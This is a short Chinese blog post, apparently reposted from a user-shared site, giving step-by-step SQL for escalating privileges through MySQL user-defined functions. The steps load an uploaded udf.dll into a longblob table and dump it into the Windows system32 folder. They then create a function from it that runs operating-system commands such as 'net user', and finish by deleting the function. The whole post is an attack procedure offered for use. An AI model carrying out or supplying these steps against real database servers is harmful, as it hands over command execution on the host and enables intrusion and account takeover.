您的位置:首页 > 其它

udf手动导出提权

2012-03-08 10:28 232 查看
当默认udf导出失败时,可以尝试用手动方法导出udf进行提权,具体方法如下:

先上传udf.dll,连接到mysql,再按下面步骤执行sql语句。

create table zz(abc longblob);//注意列类型为longblob
2.insert into zz values(load_file('C:\\udf.dll')); //上传的udf.dll路径
select * from zz into dumpfile 'C://WINDOWS//system32//udf.dll'; //导入的目标地址 mysql 5.0以上要导入到系统目录

Create Function MyCmd returns string soname 'udf.dll'; //这里如果导出的路径为C://WINDOWS//system32//udf2.dll' 可以将后面改成udf2.dll

select MyCmd (' net user ');
drop function MyCmd;

删除udf.dll 的方法,先删除生成的函数

Drop function MyCmd;
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: